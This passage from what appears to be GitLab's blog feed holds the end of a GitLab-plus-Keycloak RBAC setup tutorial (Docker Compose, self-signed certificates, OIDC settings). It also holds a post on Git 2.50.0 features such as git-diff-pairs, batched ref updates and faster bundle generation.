    FirmwareTeam --&gt; FirmwareDevelopers
    FirmwareTeam --&gt; FirmwareMaintainers
    FirmwareTeam --&gt; FirmwareReporters
    
    HardwareTeam --&gt; HardwareDevelopers
    
    SoftwareTeam --&gt; SoftwareDevelopers
    SoftwareTeam --&gt; SoftwareMaintainers
    SoftwareTeam --&gt; SoftwareReporters
</code></pre>
<h2>Demo system setup: GitLab + Keycloak in a local Docker environment</h2>
<h3>Prerequisites</h3>
<ul>
<li>Docker, Docker Compose, OpenSSL</li>
<li>GitLab Version 17.7.3 and Keycloak Version 23.0.7 container images</li>
<li>Self-signed certificates</li>
</ul>
<h3>.env configuration</h3>
<p>The demo setup uses the following GitLab and Keycloak versions, ports, and secrets.</p>
<h4>GitLab configuration</h4>
<pre><code class="language-bash">GITLAB_VERSION=17.7.3-ee.0
GITLAB_EXTERNAL_URL=http://localhost:8081
GITLAB_SSH_PORT=8222
</code></pre>
<h4>Keycloak configuration</h4>
<pre><code class="language-bash">KEYCLOAK_VERSION=23.0.7
KEYCLOAK_ADMIN=&lt;your-admin-username&gt;
KEYCLOAK_ADMIN_PASSWORD=&lt;your-admin-password&gt;
KEYCLOAK_HTTPS_PORT=8443
KEYCLOAK_CLIENT_SECRET=&lt;your-client-secret&gt;  # Get this from Keycloak after setup
</code></pre>
<h2>Generate SSL certificates</h2>
<p>To establish trust between GitLab and Keycloak, especially in a self-hosted Docker environment, we’ll need to generate self-signed SSL certificates. These certificates will enable encrypted HTTPS communication and ensure GitLab can securely talk to Keycloak during the OIDC authentication process.</p>
<p>For production environments, we recommend using certificates from a trusted Certificate Authority (CA), but for local testing and development, self-signed certificates are sufficient.</p>
<p>Follow these step-by-step instructions:</p>
<ol>
<li>Create a folder for the certificates.</li>
</ol>
<pre><code class="language-bash">mkdir -p certs
</code></pre>
<ol start="2">
<li>Generate a self-signed certificate with OpenSSL.</li>
</ol>
<pre><code class="language-bash">openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
  -keyout certs/tls.key \
  -out certs/tls.crt \
  -subj &quot;/CN=keycloak&quot; \
  -addext &quot;subjectAltName=DNS:keycloak,DNS:localhost&quot;
</code></pre>
<ol start="3">
<li>Create a PKCS12 keystore for Keycloak.</li>
</ol>
<pre><code class="language-bash">openssl pkcs12 -export \
  -in certs/tls.crt \
  -inkey certs/tls.key \
  -out certs/keystore.p12 \
  -name keycloak \
  -password pass:password
</code></pre>
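<p>To sanity-check the keystore before handing it to Keycloak, you can ask OpenSSL to read it back. This sketch regenerates a throwaway certificate and keystore (mirroring the two steps above, with the same demo password) and verifies that the keystore decrypts and carries the <code>keycloak</code> alias:</p>

```shell
# Generate a throwaway self-signed certificate (mirrors the steps above).
openssl req -x509 -nodes -days 1 -newkey rsa:2048 \
  -keyout tls.key -out tls.crt -subj "/CN=keycloak"

# Pack it into a PKCS12 keystore under the "keycloak" alias.
openssl pkcs12 -export -in tls.crt -inkey tls.key \
  -out keystore.p12 -name keycloak -password pass:password

# Reading the keystore back confirms the password and alias are correct;
# the bag attributes in the output include the friendlyName.
openssl pkcs12 -info -in keystore.p12 -passin pass:password -nokeys
```

<p>If the final command fails, Keycloak will not be able to open the keystore either, so this is a cheap check to run before starting the containers.</p>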
<h2>Start the service using Docker compose</h2>
<p>Now that we have our certificates, we can stand up our local GitLab + Keycloak environment using Docker Compose:</p>
<pre><code class="language-yaml">version: '3.8'
services:
  gitlab:
    image: gitlab/gitlab-ee:${GITLAB_VERSION}
    container_name: gitlab
    restart: unless-stopped
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url '${GITLAB_EXTERNAL_URL:-http://localhost:8081}'
        gitlab_rails['gitlab_shell_ssh_port'] = ${GITLAB_SSH_PORT:-8222}
        gitlab_rails['display_initial_root_password'] = true

        # OAuth Configuration
        gitlab_rails['omniauth_enabled'] = true
        gitlab_rails['omniauth_allow_single_sign_on'] = ['openid_connect']
        gitlab_rails['omniauth_block_auto_created_users'] = false
        gitlab_rails['omniauth_providers'] = [
            {
                'name' =&gt; 'openid_connect',
                'label' =&gt; 'Keycloak',
                'args' =&gt; {
                    'name' =&gt; 'openid_connect',
                    'scope' =&gt; ['openid', 'profile', 'email'],
                    'response_type' =&gt; 'code',
                    'issuer' =&gt; 'https://localhost:8443/realms/GitLab',
                    'client_auth_method' =&gt; 'query',
                    'discovery' =&gt; false,
                    'uid_field' =&gt; 'preferred_username',
                    'pkce' =&gt; true,
                    'client_options' =&gt; {
                        'identifier' =&gt; 'gitlab',
                        'secret' =&gt; '${KEYCLOAK_CLIENT_SECRET}',
                        'redirect_uri' =&gt; '${GITLAB_EXTERNAL_URL:-http://localhost:8081}/users/auth/openid_connect/callback',
                        'authorization_endpoint' =&gt; 'https://localhost:8443/realms/GitLab/protocol/openid-connect/auth',
                        'token_endpoint' =&gt; 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/token',
                        'userinfo_endpoint' =&gt; 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/userinfo',
                        'jwks_uri' =&gt; 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/certs'
                    }
                }
            }
        ]
    volumes:
      - gl-config:/etc/gitlab
      - gl-data:/var/opt/gitlab
      - ./certs/tls.crt:/etc/gitlab/trusted-certs/keycloak.crt
    ports:
      - '${GITLAB_EXTERNAL_PORT:-8081}:8081'
      - '${GITLAB_SSH_PORT:-8222}:22'
    shm_size: '256m'

  keycloak:
    image: quay.io/keycloak/keycloak:${KEYCLOAK_VERSION}
    container_name: keycloak-server
    restart: unless-stopped
    command: [
      &quot;start-dev&quot;,
      &quot;--import-realm&quot;,
      &quot;--https-port=${KEYCLOAK_HTTPS_PORT}&quot;,
      &quot;--https-key-store-file=/etc/x509/https/keystore.p12&quot;,
      &quot;--https-key-store-password=password&quot;
    ]
    volumes:
      - ./data:/opt/keycloak/data/import
      - ./certs:/etc/x509/https
    environment:
      KEYCLOAK_ADMIN: ${KEYCLOAK_ADMIN}
      KEYCLOAK_ADMIN_PASSWORD: ${KEYCLOAK_ADMIN_PASSWORD}
    ports:
      - &quot;${KEYCLOAK_HTTPS_PORT}:8443&quot;

volumes:
  gl-config:
  gl-data:
</code></pre>
<p>Run the following command, and your GitLab + Keycloak environment will be up in minutes:</p>
<pre><code>docker-compose up -d
</code></pre>
<h2>Keycloak realm configuration</h2>
<p>Your Keycloak realm is automatically configured on startup: the realm export in the <code>./data</code> directory is mounted into the container and loaded via the <code>--import-realm</code> flag defined in the <code>docker-compose</code> file.</p>
<p>The realm configuration will include:</p>
<ul>
<li>Pre-configured GitLab client</li>
<li>Default client secret</li>
</ul>
<p>You can access Keycloak admin console at <code>https://localhost:8443</code> with:</p>
<ul>
<li>Username: from your <code>.env</code> file (<code>KEYCLOAK_ADMIN</code>)</li>
<li>Password: from your <code>.env</code> file (<code>KEYCLOAK_ADMIN_PASSWORD</code>)</li>
<li>To verify the setup:
<ul>
<li>Log into Keycloak admin console</li>
<li>Select the <strong>GitLab</strong> realm</li>
<li>Check <strong>Clients &gt; gitlab</strong></li>
</ul>
</li>
</ul>
<p>Verify the client configuration matches your environment.</p>
<p>To showcase the automated RBAC mechanism, you will need to follow these steps:</p>
<ul>
<li>Map realm roles to GitLab roles</li>
<li>Create a group structure with role mappings that matches the group, subgroup, and project pattern in GitLab.</li>
</ul>
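<p>For the group mapping, Keycloak's built-in group membership protocol mapper can expose a user's groups as an OIDC claim that GitLab can consume. Below is a sketch of what that mapper looks like in a realm export; the claim name <code>groups</code> is an assumption and must match whatever your GitLab provider configuration expects:</p>

```json
{
  "name": "groups",
  "protocol": "openid-connect",
  "protocolMapper": "oidc-group-membership-mapper",
  "config": {
    "claim.name": "groups",
    "full.path": "true",
    "id.token.claim": "true",
    "access.token.claim": "true",
    "userinfo.token.claim": "true"
  }
}
```

<p>With <code>full.path</code> enabled, the claim carries group paths such as <code>/engineering/platform</code>, which makes it straightforward to mirror Keycloak groups onto GitLab's group hierarchy.</p>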
<p>Before provisioning your first users to the user groups, it’s recommended to log into your GitLab instance to retrieve your instance root password:</p>
<ol>
<li>
<p>Access GitLab at <code>http://localhost:8081</code>.</p>
</li>
<li>
<p>Get the root password:</p>
</li>
</ol>
<pre><code>docker exec gitlab grep 'Password:' /etc/gitlab/initial_root_password
</code></pre>
<ol start="3">
<li>Log in as root with the retrieved password.</li>
</ol>
<h2>Putting it all together</h2>
<p>To demonstrate the power of this integrated RBAC model, start by walking through a real-world user journey — from identity to access.</p>
<p>Begin in Keycloak by showcasing a user assigned to specific realm roles (e.g., developer, maintainer) and groups (e.g., /engineering/platform). These roles have been mapped to GitLab access levels via OIDC claims, while group affiliations align with GitLab’s structured hierarchy of root groups, sub-groups, and projects.</p>
<p>Upon login through GitLab’s SSO Keycloak endpoint, the user is automatically provisioned into the correct group and assigned the appropriate role — with no manual intervention.</p>
<p>Within GitLab, you can see that the user can interact with the assigned project. For example, a developer might push code and open a merge request, but not merge to protected branches — validating the least-privilege model.</p>
<p>Finally, you can showcase access across multiple teams or products that are managed centrally in Keycloak, yet enforced precisely in GitLab through group sync and permissions inheritance. This demo illustrates not just role assignment, but how GitLab and Keycloak together deliver real-time, automated access governance at scale — ready for secure, compliant, enterprise-grade software development.</p>
<h2>Why GitLab?</h2>
<p>GitLab’s comprehensive, intelligent DevSecOps platform is the ideal foundation for secure, scalable access management. With native OIDC support, granular role enforcement, SCIM-based user provisioning, and built-in audit logging, GitLab allows organizations to centralize control without compromising agility. Its flexible group hierarchy mirrors enterprise structure, making it easy to manage access across teams.</p>
<p>Integrating with identity providers like Keycloak automates onboarding, ensures least-privilege access, and creates a seamless identity-to-permission pipeline that supports regulatory and security goals. As a core component of GitLab’s security capabilities, RBAC ties directly into CI/CD, policy enforcement, and vulnerability management workflows.</p>
<h2>Summary</h2>
<p>RBAC is just the beginning. With GitLab and Keycloak, you’re not just securing access — you’re enabling structured, automated governance that scales. As you expand into policy enforcement, Secure SDLC, and DevSecOps automation, this foundation becomes a launchpad for sustainable, enterprise-grade software delivery.</p>
<blockquote>
<p>Get started with RBAC in GitLab today with a free, 60-day trial of GitLab Ultimate. <a href="https://about.gitlab.com/free-trial/">Sign up today</a>!</p>
</blockquote>
]]></content>
        <author>
            <name>James Wormwell</name>
            <uri>https://about.gitlab.com/blog/authors/james-wormwell</uri>
        </author>
        <author>
            <name>Paul Meresanu</name>
            <uri>https://about.gitlab.com/blog/authors/paul-meresanu</uri>
        </author>
        <author>
            <name>Kees Valkhof</name>
            <uri>https://about.gitlab.com/blog/authors/kees-valkhof</uri>
        </author>
        <published>2025-06-20T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[What’s new in Git 2.50.0?]]></title>
        <id>https://about.gitlab.com/blog/what-s-new-in-git-2-50-0/</id>
        <link href="https://about.gitlab.com/blog/what-s-new-in-git-2-50-0/"/>
        <updated>2025-06-16T00:00:00.000Z</updated>
<content type="html"><![CDATA[<p>The Git project recently released <a href="https://lore.kernel.org/git/xmqq1prj1umb.fsf@gitster.g/T/#u">Git version 2.50.0</a>. Let's look at a few notable highlights from this release, which includes contributions from the Git team at GitLab as well as the wider Git community.</p>
<h2>New git-diff-pairs(1) command</h2>
<p>Diffs are at the heart of every code review and show all the changes made
between two revisions. GitLab shows diffs in various places, but the most
common place is a merge request's <a href="https://docs.gitlab.com/user/project/merge_requests/changes/">&quot;Changes&quot; tab</a>.
Behind the scenes, diff generation is powered by
<a href="https://git-scm.com/docs/git-diff"><code>git-diff(1)</code></a>. For example:</p>
<pre><code class="language-shell">$ git diff HEAD~1 HEAD
</code></pre>
<p>This command returns the full diff for all changed files. This might pose a scalability challenge, because the number of files changed between two revisions can be very large, causing the command to reach self-imposed timeouts in the GitLab backend. For large change sets, it would be better if there were a way to break diff computation into smaller, more digestible chunks.</p>
<p>One way this can be achieved is by using
<a href="https://git-scm.com/docs/git-diff-tree"><code>git-diff-tree(1)</code></a> to retrieve info
about all the changed files:</p>
<pre><code class="language-shell">$ git diff-tree -r -M --abbrev HEAD~ HEAD
:100644 100644 c9adfed339 99acf81487 M      Documentation/RelNotes/2.50.0.adoc
:100755 100755 1047b8d11d 208e91a17f M      GIT-VERSION-GEN
</code></pre>
<p>Git refers to this output as the <a href="https://git-scm.com/docs/git-diff-tree#_raw_output_format">&quot;raw&quot; format</a>.
In short, each line of output lists a filepair and the accompanying metadata
about what has changed between the start and end revisions. Compared to
generating the &quot;patch&quot; output for large changes, this process is relatively
quick and provides a summary of everything that changed. The command can optionally perform rename detection: appending the <code>-M</code> flag checks whether identified changes were due to a file rename.</p>
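<p>For a simple modification, each raw line carries five space-separated fields before a tab-separated path: source mode, destination mode, source OID, destination OID, and status (renames and copies add a similarity score and a second path). A small shell sketch, using a line modeled on the output above, pulls the fields apart:</p>

```shell
# A sample "raw" diff-tree line (tab before the path); the OIDs are illustrative.
line=":100644 100644 c9adfed339 99acf81487 M"$'\t'"Documentation/RelNotes/2.50.0.adoc"

# Split on the tab first (paths may contain spaces), then split the metadata on spaces.
printf '%s\n' "$line" | awk -F'\t' '{
    split($1, meta, " ")
    printf "status=%s src=%s dst=%s path=%s\n", meta[5], meta[3], meta[4], $2
}'
# prints: status=M src=c9adfed339 dst=99acf81487 path=Documentation/RelNotes/2.50.0.adoc
```

<p>It is exactly this per-line structure that makes the raw output easy to batch and feed to downstream commands.</p>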
<p>With this information, we could use <code>git-diff(1)</code> to compute each of the
filepair diffs individually. For example, we can provide the blob IDs
directly:</p>
<pre><code class="language-shell">$ git diff 1047b8d11de767d290170979a9a20de1f5692e26 208e91a17f04558ca66bc19d73457ca64d5385f
</code></pre>
<p>We can repeat this process for each of the filepairs, but spinning up a
separate Git process for each individual file diff is not very efficient.
Furthermore, when using blob IDs, the diff loses some contextual information,
such as the change status and file modes, which are stored with the parent
tree object. What we really want is a mechanism to feed in &quot;raw&quot; filepair info and
generate the corresponding patch output.</p>
<p>With the 2.50 release, Git has a new built-in command named
<a href="https://git-scm.com/docs/git-diff-pairs"><code>git-diff-pairs(1)</code></a>. This command
accepts &quot;raw&quot; formatted filepair info as input on stdin to determine exactly which patches to output. The following example showcases how this command could be
used:</p>
<pre><code class="language-shell">$ git diff-tree -r -z -M HEAD~ HEAD | git diff-pairs -z
</code></pre>
<p>When used in this manner, the resulting output is identical to using <code>git-diff(1)</code>.
By having a separate command to generate patch output, the &quot;raw&quot; output from
<code>git-diff-tree(1)</code> can be broken up into smaller batches of filepairs and fed to separate
<code>git-diff-pairs(1)</code> processes. This solves the previously mentioned scalability
concern because diffs no longer have to be computed all at once. Future GitLab
releases could build upon this mechanism to improve diff
generation performance, especially in cases where large change sets are
concerned. For more information on this change, check out the corresponding
<a href="https://lore.kernel.org/git/20250228213346.1335224-1-jltobler@gmail.com/">mailing-list thread</a>.</p>
<p><em>This project was led by <a href="https://gitlab.com/justintobler">Justin Tobler</a>.</em></p>
<h2>Batched reference updates</h2>
<p>Git provides the <a href="https://git-scm.com/docs/git-update-ref"><code>git-update-ref(1)</code></a>
command to perform reference updates. When used with the <code>--stdin</code> flag,
multiple reference updates can be batched together in a single transaction by
specifying instructions for each reference update to be performed on stdin.
Bulk updating references in this manner also provides atomic behavior whereby a
single reference update failure results in an aborted transaction and no
references being updated. Here is an example showcasing this behavior:</p>
<pre><code class="language-shell"># Create repository with three empty commits and branch named &quot;foo&quot;
$ git init
$ git commit --allow-empty -m 1
$ git commit --allow-empty -m 2
$ git commit --allow-empty -m 3
$ git branch foo

# Print out the commit IDs
$ git rev-list HEAD
cf469bdf5436ea1ded57670b5f5a0797f72f1afc
5a74cd330f04b96ce0666af89682d4d7580c354c
5a6b339a8ebffde8c0590553045403dbda831518

# Attempt to create a new reference and update existing reference in transaction.
# Update is expected to fail because the specified old object ID doesn’t match.
$ git update-ref --stdin &lt;&lt;EOF
&gt; create refs/heads/bar cf469bdf5436ea1ded57670b5f5a0797f72f1afc
&gt; update refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c
&gt; EOF
fatal: cannot lock ref 'refs/heads/foo': is at cf469bdf5436ea1ded57670b5f5a0797f72f1afc but expected 5a74cd330f04b96ce0666af89682d4d7580c354c

# The &quot;bar&quot; reference was not created.
$ git switch bar
fatal: invalid reference: bar
</code></pre>
<p>Compared to updating many references individually, updating in bulk is also
much more efficient. While this works well, there might be certain
circumstances where it is okay for a subset of the requested reference updates
to fail, but we still want to take advantage of the efficiency gains of bulk
updates.</p>
<p>With this release, <code>git-update-ref(1)</code> has the new <code>--batch-updates</code> option,
which allows the updates to proceed even when one or more reference updates
fails. In this mode, individual failures are reported in the following format:</p>
<pre><code class="language-text">rejected SP &lt;ref&gt; SP (&lt;old-oid&gt; | &lt;old-target&gt;) SP (&lt;new-oid&gt; | &lt;new-target&gt;) SP &lt;rejection-reason&gt; LF
</code></pre>
<p>This allows successful reference updates to proceed while providing context to
which updates were rejected and for what reason. Using the same example
repository from the previous example:</p>
<pre><code class="language-shell"># Attempt to create a new reference and update existing reference in transaction.
$ git update-ref --stdin --batch-updates &lt;&lt;EOF
&gt; create refs/heads/bar cf469bdf5436ea1ded57670b5f5a0797f72f1afc
&gt; update refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c
&gt; EOF
rejected refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c incorrect old value provided

# The &quot;bar&quot; reference was created even though the update to &quot;foo&quot; was rejected.
$ git switch bar
Switched to branch 'bar'
</code></pre>
<p>This time, with the <code>--batch-updates</code> option, the reference creation succeeded
even though the update didn't work. This patch series lays the groundwork for
future performance improvements in <code>git-fetch(1)</code> and <code>git-receive-pack(1)</code>
when references are updated in bulk. For more information, check the
<a href="https://lore.kernel.org/git/20250408085120.614893-1-karthik.188@gmail.com/">mailing-list thread</a>.</p>
<p><em>This project was led by <a href="https://gitlab.com/knayakgl">Karthik Nayak</a>.</em></p>
<h2>New filter option for git-cat-file(1)</h2>
<p>With <a href="https://git-scm.com/docs/git-cat-file"><code>git-cat-file(1)</code></a>, it is possible
to print info for all objects contained in the repository via the
<code>--batch-all-objects</code> option. For example:</p>
<pre><code class="language-shell"># Setup simple repository.
$ git init
$ echo foo &gt;foo
$ git add foo
$ git commit -m init

# Create an unreachable object.
$ git commit --amend --no-edit

# Use git-cat-file(1) to print info about all objects including unreachable objects.
$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)'
commit 0b07e71d14897f218f23d9a6e39605b466454ece
tree 205f6b799e7d5c2524468ca006a0131aa57ecce7
blob 257cc5642cb1a054f08cc83f2d943e56fd3ebe99
commit c999f781fd7214b3caab82f560ffd079ddad0115
</code></pre>
<p>In some situations, a user might want to search through all objects in the
repository, but only output a subset based on some specified attribute. For
example, if we wanted to see only the objects that are commits, we could use
<code>grep(1)</code>:</p>
<pre><code class="language-shell">$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' | grep ^commit
commit 0b07e71d14897f218f23d9a6e39605b466454ece
commit c999f781fd7214b3caab82f560ffd079ddad0115
</code></pre>
<p>While this works, one downside with filtering the output is that
<code>git-cat-file(1)</code> still has to traverse all the objects in the repository, even
the ones that the user is not interested in. This can be rather inefficient.</p>
<p>With this release, <code>git-cat-file(1)</code> now has the <code>--filter</code> option, which only
shows objects matching the specified criteria. This is similar to the option of
the same name for <code>git-rev-list(1)</code>, but with only a subset of the filters
supported. The supported filters are <code>blob:none</code>, <code>blob:limit=</code>, as well as
<code>object:type=</code>. Similar to the previous example, objects can be filtered by
type with Git directly:</p>
<pre><code class="language-shell">$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' --filter='object:type=commit'
commit 0b07e71d14897f218f23d9a6e39605b466454ece
commit c999f781fd7214b3caab82f560ffd079ddad0115
</code></pre>
<p>Not only is it convenient to let Git handle the filtering; for large
repositories with many objects, it is also potentially more efficient. If a
repository has bitmap indices, Git can efficiently
look up objects of a specific type and avoid scanning through the
packfile, which leads to a significant speedup. Benchmarks conducted on the
<a href="https://github.com/chromium/chromium.git">Chromium repository</a> show
significant improvements:</p>
<pre><code class="language-text">Benchmark 1: git cat-file --batch-check --batch-all-objects --unordered --buffer --no-filter
   Time (mean ± σ):     82.806 s ±  6.363 s    [User: 30.956 s, System: 8.264 s]
   Range (min … max):   73.936 s … 89.690 s    10 runs

Benchmark 2: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tag
   Time (mean ± σ):      20.8 ms ±   1.3 ms    [User: 6.1 ms, System: 14.5 ms]
   Range (min … max):    18.2 ms …  23.6 ms    127 runs

Benchmark 3: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=commit
   Time (mean ± σ):      1.551 s ±  0.008 s    [User: 1.401 s, System: 0.147 s]
   Range (min … max):    1.541 s …  1.566 s    10 runs

Benchmark 4: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tree
   Time (mean ± σ):     11.169 s ±  0.046 s    [User: 10.076 s, System: 1.063 s]
   Range (min … max):   11.114 s … 11.245 s    10 runs

Benchmark 5: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=blob
   Time (mean ± σ):     67.342 s ±  3.368 s    [User: 20.318 s, System: 7.787 s]
   Range (min … max):   62.836 s … 73.618 s    10 runs

Benchmark 6: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=blob:none
   Time (mean ± σ):     13.032 s ±  0.072 s    [User: 11.638 s, System: 1.368 s]
   Range (min … max):   12.960 s … 13.199 s    10 runs

Summary
   git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tag
    74.75 ± 4.61 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=commit
   538.17 ± 33.17 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tree
   627.98 ± 38.77 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=blob:none
  3244.93 ± 257.23 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=blob
  3990.07 ± 392.72 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --no-filter
</code></pre>
<p>Interestingly, these results indicate that the computation time now scales with
the number of objects of the given type instead of the total number of objects
in the packfile. The original mailing-list thread can be found
<a href="https://lore.kernel.org/git/20250221-pks-cat-file-object-type-filter-v1-0-0852530888e2@pks.im/">here</a>.</p>
<p><em>This project was led by <a href="https://gitlab.com/pks-gitlab">Patrick Steinhardt</a>.</em></p>
<h2>Improved performance when generating bundles</h2>
<p>Git provides a means to generate an archive of a repository which contains a
specified set of references and accompanying reachable objects via the
<a href="https://git-scm.com/docs/git-bundle"><code>git-bundle(1)</code></a> command. This operation
is used by GitLab to generate repository backups and also as part of the
<a href="https://git-scm.com/docs/bundle-uri">bundle-URI</a> mechanism.</p>
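<p>As a minimal illustration of the command itself — the repository contents, paths, and demo identity below are hypothetical — a bundle containing every reference can be created, verified, and then cloned from like any other remote:</p>
<pre><code class="language-shell"># Build a small throwaway repository.
repo=$(mktemp -d)
git init --quiet "$repo"
cd "$repo"
echo 'hello' > README.md
git add README.md
git -c user.name=demo -c user.email=demo@example.com commit --quiet -m 'initial commit'

# Bundle all references (plus HEAD, so clones know what to check out),
# verify that the result is self-contained, and restore from it.
bundle=$(mktemp -d)/backup.bundle
git bundle create "$bundle" --all HEAD
git bundle verify "$bundle"
git clone --quiet "$bundle" "$repo-restored"
</code></pre>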
<p>For large repositories containing millions of references, this operation can
take hours or even days. For example, with the main GitLab repository
(<a href="https://gitlab.com/gitlab-org/gitlab">gitlab-org/gitlab</a>), backup times were
around 48 hours. Investigation revealed there was a performance bottleneck due
to how Git was performing a check to avoid duplicated references being included
in the bundle. The implementation used a nested <code>for</code> loop to iterate and
compare all listed references, leading to O(N^2) time complexity. This scales
very poorly as the number of references in a repository increases.</p>
<p>In this release, this issue was addressed by replacing the nested loops with a
map data structure, leading to a significant speedup. The following benchmark
shows the performance improvement when creating a bundle for a repository
containing 100,000 references:</p>
<pre><code class="language-text">Benchmark 1: bundle (refcount = 100000, revision = master)
  Time (mean ± σ):     14.653 s ±  0.203 s    [User: 13.940 s, System: 0.762 s]
  Range (min … max):   14.237 s … 14.920 s    10 runs

Benchmark 2: bundle (refcount = 100000, revision = HEAD)
  Time (mean ± σ):      2.394 s ±  0.023 s    [User: 1.684 s, System: 0.798 s]
  Range (min … max):    2.364 s …  2.425 s    10 runs

Summary
  bundle (refcount = 100000, revision = HEAD) ran
    6.12 ± 0.10 times faster than bundle (refcount = 100000, revision = master)
</code></pre>
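<p>The shape of this benchmark can be reproduced at a smaller scale. A sketch using a hypothetical 1,000 references (the benchmark above used 100,000) in a throwaway repository:</p>
<pre><code class="language-shell"># Throwaway repository with a single empty commit.
repo=$(mktemp -d)
git init --quiet "$repo"
cd "$repo"
git -c user.name=demo -c user.email=demo@example.com commit --quiet --allow-empty -m demo
tip=$(git rev-parse HEAD)

# Create 1,000 branches in one batch; `git update-ref --stdin` avoids
# forking one process per reference.
for i in $(seq 1 1000); do
    printf 'create refs/heads/branch-%d %s\n' "$i" "$tip"
done | git update-ref --stdin

# Bundle every reference and report a rough wall-clock time.
start=$(date +%s)
git bundle create "$repo.bundle" --all
echo "bundle created in $(( $(date +%s) - start ))s"
</code></pre>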
<p>To learn more, check out our blog post
<a href="https://about.gitlab.com/blog/how-we-decreased-gitlab-repo-backup-times-from-48-hours-to-41-minutes/">How we decreased GitLab repo backup times from 48 hours to 41 minutes</a>.
You can also find the original mailing list thread
<a href="https://lore.kernel.org/git/20250401-488-generating-bundles-with-many-references-has-non-linear-performance-v1-0-6d23b2d96557@gmail.com/">here</a>.</p>
<p><em>This project was led by <a href="https://gitlab.com/knayakgl">Karthik Nayak</a>.</em></p>
<h2>Better bundle URI unbundling</h2>
<p>Through the <a href="https://git-scm.com/docs/bundle-uri">bundle URI</a> mechanism in Git,
clients can be given locations to fetch bundles from, with the goal of speeding
up clones and fetches. When a client downloads a bundle, references under
<code>refs/heads/*</code> are copied from the bundle into the repository along with
their accompanying objects. A bundle might contain additional references
outside of <code>refs/heads/*</code>, such as <code>refs/tags/*</code>, which are simply ignored when
using a bundle URI on clone.</p>
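<p>You can see which references a bundle actually carries with <code>git bundle list-heads</code>. A sketch using a hypothetical throwaway repository with one branch and one tag:</p>
<pre><code class="language-shell"># Throwaway repository with one commit and one tag.
repo=$(mktemp -d)
git init --quiet "$repo"
cd "$repo"
git -c user.name=demo -c user.email=demo@example.com commit --quiet --allow-empty -m demo
git tag v1.0

# The bundle records the tag either way; whether a clone copies it
# into the repository is what changed in Git 2.50.
git bundle create "$repo.bundle" --all
git bundle list-heads "$repo.bundle"
</code></pre>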
<p>In Git 2.50, this restriction is lifted, and all references
matching <code>refs/*</code> contained in the downloaded bundle are copied.
<a href="https://github.com/schacon">Scott Chacon</a>, who contributed this functionality,
demonstrates the difference when cloning
<a href="https://gitlab.com/gitlab-org/gitlab-foss">gitlab-org/gitlab-foss</a>:</p>
<pre><code class="language-shell">$ git-v2.49 clone --bundle-uri=gitlab-base.bundle https://gitlab.com/gitlab-org/gitlab-foss.git gl-2.49
Cloning into 'gl-2.49'...
remote: Enumerating objects: 1092703, done.
remote: Counting objects: 100% (973405/973405), done.
remote: Compressing objects: 100% (385827/385827), done.
remote: Total 959773 (delta 710976), reused 766809 (delta 554276), pack-reused 0 (from 0)
Receiving objects: 100% (959773/959773), 366.94 MiB | 20.87 MiB/s, done.
Resolving deltas: 100% (710976/710976), completed with 9081 local objects.
Checking objects: 100% (4194304/4194304), done.
Checking connectivity: 959668, done.
Updating files: 100% (59972/59972), done.

$ git-v2.50 clone --bundle-uri=gitlab-base.bundle https://gitlab.com/gitlab-org/gitlab-foss.git gl-2.50
Cloning into 'gl-2.50'...
remote: Enumerating objects: 65538, done.
remote: Counting objects: 100% (56054/56054), done.
remote: Compressing objects: 100% (28950/28950), done.
remote: Total 43877 (delta 27401), reused 25170 (delta 13546), pack-reused 0 (from 0)
Receiving objects: 100% (43877/43877), 40.42 MiB | 22.27 MiB/s, done.
Resolving deltas: 100% (27401/27401), completed with 8564 local objects.
Updating files: 100% (59972/59972), done.
</code></pre>
<p>Comparing these results, we see that Git 2.50 fetches 43,877 objects
(40.42 MiB) after the bundle is extracted, whereas Git 2.49 fetches a
total of 959,773 objects (366.94 MiB). Git 2.50 fetches roughly 95% fewer
objects and 90% less data, which benefits both the client and the server: the
server has to send far less data, and the client has to download and extract
far less. In the example provided by Scott, this led to a speedup of 25%.</p>
<p>To learn more, check out the corresponding
<a href="https://lore.kernel.org/git/pull.1897.git.git.1740489585344.gitgitgadget@gmail.com/">mailing-list thread</a>.</p>
<p><em>This patch series was contributed by <a href="https://github.com/schacon">Scott Chacon</a>.</em></p>
<h2>Read more</h2>
<p>This article highlighted just a few of the contributions made by GitLab and
the wider Git community for this latest release. You can learn about these from
the <a href="https://lore.kernel.org/git/xmqq1prj1umb.fsf@gitster.g/">official release announcement</a> of the Git project. Also, check
out our <a href="https://about.gitlab.com/blog/tags/git/">previous Git release blog posts</a>
to see other past highlights of contributions from GitLab team members.</p>
]]></content>
        <author>
            <name>Justin Tobler</name>
            <uri>https://about.gitlab.com/blog/authors/justin-tobler</uri>
        </author>
        <published>2025-06-16T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[AI-native GitLab Premium: Transform higher education software development]]></title>
        <id>https://about.gitlab.com/blog/ai-native-gitlab-premium-transform-higher-education-software-development/</id>
        <link href="https://about.gitlab.com/blog/ai-native-gitlab-premium-transform-higher-education-software-development/"/>
        <updated>2025-06-10T00:00:00.000Z</updated>
